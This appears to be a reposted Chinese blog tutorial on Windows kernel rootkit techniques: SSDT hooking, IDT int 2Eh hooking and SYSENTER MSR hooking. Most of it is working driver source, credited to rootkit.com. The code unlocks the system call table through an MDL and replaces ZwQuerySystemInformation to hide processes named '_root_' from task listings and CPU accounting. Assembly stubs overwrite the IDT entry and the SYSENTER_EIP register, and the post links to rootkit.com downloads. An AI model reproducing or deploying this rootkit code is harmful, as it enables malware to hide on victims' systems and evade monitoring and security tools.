【詳細過程】
? 這次主要說說核心層的hook。包括SSDT-hook，IDT-hook，sysenter-hook。歡迎討論，指正！內核層需要驅動，有這方面的基礎最好，如果不會，了解下其中的思路也可以的。
?
? II. SSDT-hook,IDT-hook，sysenter-hook
? 一.SSDT-hook
? (一)一般思路:
? 1.先來了解一下,什么是SSDT
? SSDT既System Service Dispath? Table。在了解他之前，我們先了解一下NT的基本組建。在 Windows NT 下，NT 的 executive（NTOSKRNL.EXE 的一部分）提供了核心系統服務。各種 Win32、OS/2 和 POSIX 的 APIs 都是以 DLL 的形式提供的。這些dll中的 APIs 轉過來調用了 NT executive 提供的服務。盡管調用了相同的系統服務，但由于子系統不同，API 函數的函數名也不同。例如，要用Win32 API 打開一個文件，應用程序會調用 CreateFile()，而要用 POSIX API，則應用程序調用 open() 函數。這兩種應用程序最終都會調用 NT executive 中的 NtCreateFile() 系統服務。
系統組建.jpg
系統組件.JPG
用戶模式（User mode）的所有調用，如Kernel32,User32.dll, Advapi32.dll等提供的API，最終都封裝在Ntdll.dll中,然后通過Int 2E或SYSENTER進入到內核模式，通過服務ID,在System Service Dispatcher Table中分派系統函數，舉個具體的例子，再如下圖
調用過程.jpg
調用過程.JPG
? 從上可知，SSDT就是一個表，這個表中有內核調用的函數地址。從上圖可見，當用戶層調用FindNextFile函數時，最終會調用內核層的NtQueryDirectoryFile函數，而這個函數的地址就在SSDT表中，如果我們事先把這個地址改成我們特定函數的地址，那么，哈哈。。。。。。。下來詳細了解一下，SSDT的結構，如下圖：
SSDT.jpg
SSDT.JPG
? KeServiceDescriptorTable：是由內核（Ntoskrnl.exe）導出的一個表，這個表是訪問SSDT的關鍵，具體結構是
? typedef struct ServiceDescriptorTable {
? PVOID ServiceTableBase;
? PVOID ServiceCounterTable(0);
? unsigned int NumberOfServices;
? PVOID ParamTableBase;
? }
?
? 其中，
? ServiceTableBase System Service Dispatch Table 的基地址。
? NumberOfServices 由 ServiceTableBase 描述的服務的數目。
? ServiceCounterTable 此域用于操作系統的 checked builds，包含著 SSDT 中每個服務被調用次數的計數器。這個計數器由 INT 2Eh 處理程序 (KiSystemService)更新。
? ParamTableBase 包含每個系統服務參數字節數表的基地址。
? System Service Dispath Table（SSDT）：系統服務分發表，給出了服務函數的地址，每個地址4子節長。
? System Service Parameter Table(SSPT)：系統服務參數表，定義了對應函數的參數字節，每個函數對應一個字節。如在0x804AB3BF處的函數需0x18字節的參數。
? 還有一種這樣的表，叫KeServiceDescriptorTableShadow，它主要包含GDI服務，也就是我們常用的和窗口，桌面有關的，具體存在于Win32k.sys。在如圖：
? 服務分發.jpg
服務分發.JPG
? 右側的服務分發就通過KeServiceDescriptorTableShadow。
? 那么下來該咋辦呢？下來就是去改變SSDT所指向的函數，使之指向我們自己的函數。
? 2．Hook前的準備-改變SSDT內存的保護
? 系統對SSDT都是只讀的，不能寫。如果試圖去寫，等你的就是藍臉。一般可以修改內存屬性的方法有：通過cr0寄存器及Memory Descriptor List(MDL)。
? （1）改變CR0寄存器的第1位
? Windows對內存的分配，是采用的分頁管理。其中有個CR0寄存器，如下圖：
CR0.jpg
cr0.jpg??
? 其中第1位叫做保護屬性位，控制著頁的讀或寫屬性。如果為1，則可以讀/寫/執行；如果為0，則只可以讀/執行。SSDT，IDT的頁屬性在默認下都是只讀，可執行的，但不能寫。所以現在要把這一位設置成1。
? （2）通過Memory Descriptor List(MDL)
? 也就是把原來SSDT的區域映射到我們自己的MDL區域中，并把這個區域設置成可寫。MDL的結構：
? typedef struct _MDL {
? struct _MDL *Next;??
? CSHORT Size;??????
? CSHORT MdlFlags;? //關鍵在這里，將來設置成MDL_MAPPED_TO_SYSTEM_VA ，這樣一來，這塊區域就可寫
? struct _EPROCESS *Process;
? PVOID MappedSystemVa;
? PVOID StartVa;
? ULONG ByteCount;
? ULONG ByteOffset;
? } MDL, *PMDL;
? 首先需要知道KeServiceDscriptorTable的基址和入口數，這樣就可以用MmCreateMdl創建一個有起始地址和大小的內存區域。然后把這個MDL結構的flag改成
? MDL_MAPPED_TO_SYSTEM_VA ，那么這個區域就可以寫了。最后把這個內存區域調用MmMapLockedPages鎖定在內存中。大體框架如下：
? //先聲明一個System Service Descriptor Table，我們知道SSDT及SSPT都從這個表中指向
? #pragma pack(1)
? typedef struct ServiceDescriptorEntry {
?
????????? unsigned int *ServiceTableBase;
?
????????? unsigned int *ServiceCounterTableBase;
?
????????? unsigned int NumberOfServices;
?
????????? unsigned char *ParamTableBase;
?
? } SSDT_Entry;
?
? #pragma pack()
?
? __declspec(dllimport) SSDT_Entry KeServiceDescriptorTable;
?
?
? /
? PMDL? g_pmdlSystemCall;
?
? PVOID *MappedSystemCallTable;
? // 代碼
? // 保存原系統調用位置
?
?
?
? // 映射我們的區域
?
? g_pmdlSystemCall = MmCreateMdl(NULL,
?
???????????????????? KeServiceDescriptorTable.ServiceTableBase,
?
???????????????????? KeServiceDescriptorTable.NumberOfServices*4);
?
? if(!g_pmdlSystemCall)
?
???? return STATUS_UNSUCCESSFUL;
?
? MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
?
? // 改變MDL的flags
?
? g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags |
?
?????????????????????????????? MDL_MAPPED_TO_SYSTEM_VA;
?
?
? //在內存中索定，不讓換出
? MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
?
? 現在遇到的第一個問題解決了，但接著面臨另外一個問題，如何獲得SSDT中函數的地址呢？
? 3．四個有用的宏
? SYSTEMSERVICE macro：可以獲得由ntoskrnl.exe導出函數,以Zw*開頭函數的地址，這個函數的返回值就是Nt*函數，Nt*函數的地址就在SSDT中
? SYSCALL_INDEX macro：獲得Zw*函數的地址并返回與之通信的函數在SSDT中的索引。
? 這兩個宏之所以能工作，是因為所有的Zw*函數都開始于opcode：MOV eax, ULONG，這里的ULONG就是系統調用函數在SSDT中的索引。
? HOOK_SYSCALL和UNHOOK_SYSCALL macros：獲得Zw*函數的地址，取得他的索引，自動的交換SSDT中索引所對應的函數地址和我們hook函數的地址。
? 這四個宏具體是：
? #define SYSTEMSERVICE(_func) \
????????? KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_func+1)]
?
? #define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
?
? #define HOOK_SYSCALL(_Function, _Hook, _Orig )?????? \
?
????????? _Orig = (PVOID) InterlockedExchange( (PLONG) \
?
????????? &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
?
? #define UNHOOK_SYSCALL(_Func, _Hook, _Orig )? \
?
????????? InterlockedExchange((PLONG)?????????? \
?
????????? &MappedSystemCallTable[SYSCALL_INDEX(_Func)], (LONG) _Hook)
?????
? 4．小試牛刀：利用SSDT Hook隱藏進程
? 我們所熟知的任務管理器，能察看系統中的所有進程及其他很多信息，這是由于調用了一個叫ZwQuerySystemInformation的內核函數，具體結構是：
? NTSTATUS NewZwQuerySystemInformation(
? IN ULONG SystemInformationClass,? //如果這值是5，則代表系統中所有進程信息
? IN PVOID SystemInformation,? //這就是最終列舉出的信息，和上面的值有關
? IN ULONG SystemInformationLength, //后兩個不重要
? OUT PULONG ReturnLength)
? 如果用我們自己函數，這個函數可以把我們關心的進程過濾掉，再把它與原函數調換，則可達到隱藏的目的，大體思路如下：
? （1）? 突破SSDT的內存保護，如上所用的MDL方法
? （2）? 實現自己的NewZwQuerySystemInformation函數，過濾掉以某些字符開頭的進程
? （3）? 用上面介紹的宏來交換ZwQuerySystemInformation與我們自己的New*函數
? （4）? 卸載New*函數，完成
? 具體實例：來自Rootkit.com，我做了注釋，代碼也很精小。
#include "ntddk.h"
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
??????? unsigned int *ServiceTableBase;
??????? unsigned int *ServiceCounterTableBase; //僅適用于checked build版本
??????? unsigned int NumberOfServices;
??????? unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport)? ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
//獲得SSDT基址宏
#define SYSTEMSERVICE(_function)? KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

PMDL? g_pmdlSystemCall;
PVOID *MappedSystemCallTable;
//獲得函數在SSDT中的索引宏
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
//調換自己的hook函數與原系統函數的地址
#define HOOK_SYSCALL(_Function, _Hook, _Orig )? \
?????? _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
//卸載hook函數
#define UNHOOK_SYSCALL(_Function, _Hook, _Orig )? \
?????? InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

//聲明各種結構
struct _SYSTEM_THREADS
{
??????? LARGE_INTEGER?????????? KernelTime;
??????? LARGE_INTEGER?????????? UserTime;
??????? LARGE_INTEGER?????????? CreateTime;
??????? ULONG?????????????????????????? WaitTime;
??????? PVOID?????????????????????????? StartAddress;
??????? CLIENT_ID?????????????????????? ClientIs;
??????? KPRIORITY?????????????????????? Priority;
??????? KPRIORITY?????????????????????? BasePriority;
??????? ULONG?????????????????????????? ContextSwitchCount;
??????? ULONG?????????????????????????? ThreadState;
??????? KWAIT_REASON??????????? WaitReason;
};

struct _SYSTEM_PROCESSES
{
??????? ULONG?????????????????????????? NextEntryDelta;
??????? ULONG?????????????????????????? ThreadCount;
??????? ULONG?????????????????????????? Reserved[6];
??????? LARGE_INTEGER?????????? CreateTime;
??????? LARGE_INTEGER?????????? UserTime;
??????? LARGE_INTEGER?????????? KernelTime;
??????? UNICODE_STRING????????? ProcessName;
??????? KPRIORITY?????????????????????? BasePriority;
??????? ULONG?????????????????????????? ProcessId;
??????? ULONG?????????????????????????? InheritedFromProcessId;
??????? ULONG?????????????????????????? HandleCount;
??????? ULONG?????????????????????????? Reserved2[2];
??????? VM_COUNTERS???????????????????? VmCounters;
??????? IO_COUNTERS???????????????????? IoCounters; //windows 2000 only
??????? struct _SYSTEM_THREADS????????? Threads[1];
};

// Added by Creative of rootkit.com
struct _SYSTEM_PROCESSOR_TIMES
{
??? LARGE_INTEGER????????? IdleTime;
??? LARGE_INTEGER????????? KernelTime;
??? LARGE_INTEGER????????? UserTime;
??? LARGE_INTEGER????????? DpcTime;
??? LARGE_INTEGER????????? InterruptTime;
??? ULONG????????????? InterruptCount;
};

NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
??????????? IN ULONG SystemInformationClass,
??????????????????????? IN PVOID SystemInformation,
??????????????????????? IN ULONG SystemInformationLength,
??????????????????????? OUT PULONG ReturnLength);

typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
??????????? ULONG SystemInformationCLass,
??????????????????????? PVOID SystemInformation,
??????????????????????? ULONG SystemInformationLength,
??????????????????????? PULONG ReturnLength
);

ZWQUERYSYSTEMINFORMATION??????? OldZwQuerySystemInformation;

// Added by Creative of rootkit.com
LARGE_INTEGER????????? m_UserTime;
LARGE_INTEGER????????? m_KernelTime;

//我們的hook函數，過濾掉以"_root_"開頭的進程
NTSTATUS NewZwQuerySystemInformation(
??????????? IN ULONG SystemInformationClass,
??????????? IN PVOID SystemInformation,
??????????? IN ULONG SystemInformationLength,
??????????? OUT PULONG ReturnLength)
{

?? NTSTATUS ntStatus;

?? ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
????????? SystemInformationClass,
????????? SystemInformation,
????????? SystemInformationLength,
????????? ReturnLength );

?? if( NT_SUCCESS(ntStatus))
?? {
????? // Asking for a file and directory listing
????? if(SystemInformationClass == 5)
????? {
?????? // 列舉系統進程鏈表
???? // 尋找以"_root_"開頭的進程
????
?????????
???? struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
??????????? struct _SYSTEM_PROCESSES *prev = NULL;
????
???? while(curr)
???? {
??????????? //DbgPrint("Current item is %x\n", curr);
????? if (curr->ProcessName.Buffer != NULL)
????? {
??????? if(0 == memcmp(curr->ProcessName.Buffer, L"_root_", 12))
??????? {
????????? m_UserTime.QuadPart += curr->UserTime.QuadPart;
????????? m_KernelTime.QuadPart += curr->KernelTime.QuadPart;

????????? if(prev) // Middle or Last entry
????????? {
??????????? if(curr->NextEntryDelta)
????????????? prev->NextEntryDelta += curr->NextEntryDelta;
??????????? else? // we are last, so make prev the end
????????????? prev->NextEntryDelta = 0;
????????? }
????????? else
????????? {
??????????? if(curr->NextEntryDelta)
??????????? {
????????????? // we are first in the list, so move it forward
????????????? (char *)SystemInformation += curr->NextEntryDelta;
??????????? }
??????????? else // we are the only process!
????????????? SystemInformation = NULL;
????????? }
??????? }
????? }
????? else // Idle process入口
????? {
???????? //? 把_root_進程的時間加給Idle進程，Idle稱空閑時間
?????????
???????? curr->UserTime.QuadPart += m_UserTime.QuadPart;
???????? curr->KernelTime.QuadPart += m_KernelTime.QuadPart;

???????? // 重設時間，為下一次過濾
???????? m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
????? }
????? prev = curr;
??????? if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
??????? else curr = NULL;
?????? }
??? }
??? else if (SystemInformationClass == 8) // 列舉系統進程時間
??? {
???????? struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
???????? times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
??? }

?? }
?? return ntStatus;
}

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
?? DbgPrint("ROOTKIT: OnUnload called\n");

?? // 卸載hook
?? UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );

?? // 解索并釋放MDL
?? if(g_pmdlSystemCall)
?? {
????? MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
????? IoFreeMdl(g_pmdlSystemCall);
?? }
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
?????????? IN PUNICODE_STRING theRegistryPath)
{
?? // 注冊一個卸載的分發函數，與與應用層溝通
?? theDriverObject->DriverUnload? = OnUnload;

?? // 初始化全局時間為零
?? // 這將會解決時間問題，如果不這樣，盡管隱藏了進程，但時間的消耗會不變，cpu 100%
?? m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;

?? // 儲存舊的函數地址
?? OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));

?? // 把SSDT隱射到我們的區域，以便修改它為可寫屬性
?? g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
?? if(!g_pmdlSystemCall)
????? return STATUS_UNSUCCESSFUL;

?? MmBuildMdlForNonPagedPool(g_pmdlSystemCall);

?? // 改變MDL的Flags屬性為可寫，既然可寫當然可讀，可執行
?? g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;

?? MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);

?? // 用了宏，把原來的Zw*替換成我們的New*函數。至此已完成了我們的主要兩步，先突破了SSDT的保護，接著用宏更改了目標函數，下來就剩下具體的過濾任務了
?? HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
?????????????????????????????
?? return STATUS_SUCCESS;
}
?
? 二．IDT hook
? （一）基本思路：IDT(Interrupt Descriptor Table)中斷描述符表，是用來處理中斷的。中斷就是停下現在的活動，去完成新的任務。一個中斷可以起源于軟件或硬件。比如，出現頁錯誤，調用IDT中的0x0E。或用戶進程請求系統服務(SSDT)時，調用IDT中的0x2E。而系統服務的調用是經常的，這個中斷就能觸發。我們現在就想辦法，先在系統中找到IDT，然后確定0x2E在IDT中的地址，最后用我們的函數地址去取代它，這樣以來，用戶的進程（可以特定設置）一調用系統服務，我們的hook函數即被激發。
? （二）需解決的問題：從上面分析可以看出，我們大概需要解決這幾個問題：
? 1．IDT如何獲取呢？SIDT指令可以辦到，它可以在內存中找到IDT，返回一個IDTINFO結構的地址。這個結構中就含有IDT的高半地址和低半地址。為了方便把這兩個半地址合在一起，我們可以用一個宏。IDTINFO，和宏的結構如下：
? typedef struct
? {
? WORD IDTLimit;
? WORD LowIDTbase;? //IDT的低半地址
? WORD HiIDTbase;??? //IDT的高半地址
? } IDTINFO;
? 方便獲取地址存取的宏
? #define MAKELONG(a, b)((LONG)(((WORD)(a))|((DWORD)((WORD)(b)))<< 16))
? 2．IDT有最多256個入口，我們現在要的是其中的0x2E，這個中斷號的入口地址如何獲取呢？
?? #pragma pack(1)
? typedef struct
? {
? WORD LowOffset;?????????? //入口的低半地址
? WORD selector;
? BYTE unused_lo;
? unsigned char unused_hi:5;???? // stored TYPE ?
? unsigned char DPL:2;
? unsigned char P:1;???????? // vector is present
? WORD HiOffset;????????? //入口地址的低半地址
? } IDTENTRY;
? #pragma pack()
? 知道了這個入口結構,就相當于知道了每間房（可以把IDT看作是一排有256間房組成的線性結構）的長度，我們先獲取所有的入口idt_entrys，那么第0x2E個房間的地址也就可以確定了，即idt_entrys[0x2E]。
? 3．如果得到了0x2e的地址，如何用我們的hook地址改寫原中斷地址呢？ 見以下核心代碼：
? DWORD KiRealSystemServiceISR_Ptr; // 真正的2E句柄，保存以便恢復hook
? #define NT_SYSTEM_SERVICE_INT 0x2e
? //我們的hook函數
? int HookInterrupts()
? {
?
???? IDTINFO idt_info;????????? //SIDT將返回的結構
?
???? IDTENTRY* idt_entries;??? //IDT的所有入口
?
???? IDTENTRY* int2e_entry;??? //我們目標的入口
?
???? __asm{
?
??????? sidt idt_info;???????? //獲取IDTINFO
?
???? }
??? //獲取所有的入口
???? idt_entries =
?
??? (IDTENTRY*)MAKELONG(idt_info.LowIDTbase,idt_info.HiIDTbase);
? //保存真實的2e地址
???? KiRealSystemServiceISR_Ptr =
??????????????????????????????? MAKELONG(idt_entries[NT_SYSTEM_SERVICE_INT].LowOffset,
?
?????????? idt_entries[NT_SYSTEM_SERVICE_INT].HiOffset);
?
??
? //獲取0x2E的入口地址
???? int2e_entry = &(idt_entries[NT_SYSTEM_SERVICE_INT]);
?
???? __asm{
?
?????? cli;?????????????????????? // 屏蔽中斷，防止被打擾
?
?????? lea eax,MyKiSystemService; // 獲得我們hook函數的地址，保存在eax
?
?????? mov ebx, int2e_entry;????? // 0x2E在IDT中的地址，ebx中分地高兩個半地址
?
?????? mov [ebx],ax;????????????? // 把我們hook函數的地半地址寫入真是第半地址
?
???? shr eax,16???????????????? //eax右移16，得到高半地址
?
?????? mov [ebx+6],ax;?????????? // 寫入高半地址
?
???? sti;????????????????????? //開中斷
?
???? }
?
???? return 0;
?
? }
具體代碼見：www.rootkit.com/vault/fuzen_op/strace_Fuzen.zip
? （三）注意點：
? 1.每個處理器都有個IDT,所以對于多CPU一定要注意，所有的IDT都要hook。
? 2．在winxp,win2k3,vsta下失效。
?
? 三．SYSENTRY hook
? 為了性能的考慮，xp后的系統都改用sysentry命令來進入ring0，去調用SSDT中的服務，不再是通過IDT中的 int 2E。這也使得我們hook也變得相對容易了。
? 首先獲得sysentry的地址，然后改之，不用再考慮IDT了。見下面的代碼：
? #include "ntddk.h"
?
? ULONG d_origKiFastCallEntry; // 原ntoskrnl!KiFastCallEntry地址
?
? VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
? {
??? DbgPrint("ROOTKIT: OnUnload called\n");
? }
?
? // Hook function
? __declspec(naked) MyKiFastCallEntry()
? {
??? __asm {
????? jmp [d_origKiFastCallEntry]? //這啥都沒做，換成你想干的
????????? }
? }
?
? NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
? {
??? theDriverObject->DriverUnload? = OnUnload;
?
??? __asm {
???????????????????? mov ecx, 0x176????????????????
????? rdmsr????????????????????????? // 讀IA3_SYSENTER_EIP寄存器值，存有sysenter的地址????????????
????? mov d_origKiFastCallEntry, eax //保存原值，以便恢復
????? mov eax, MyKiFastCallEntry???? // hook函數地址
????? wrmsr????????????????????????? // 將hook函數移入IA32_SYSENTER_EIP寄存器
??? }
?
??? return STATUS_SUCCESS;
? }
?
?
?基本的改變數據結構的hook就說到這里，當然還有DKOM這種高級的技術，有興趣的自己去看看吧。

本文來自CSDN博客，轉載請標明出處：http://blog.csdn.net/geagle/archive/2007/05/07/1598610.aspx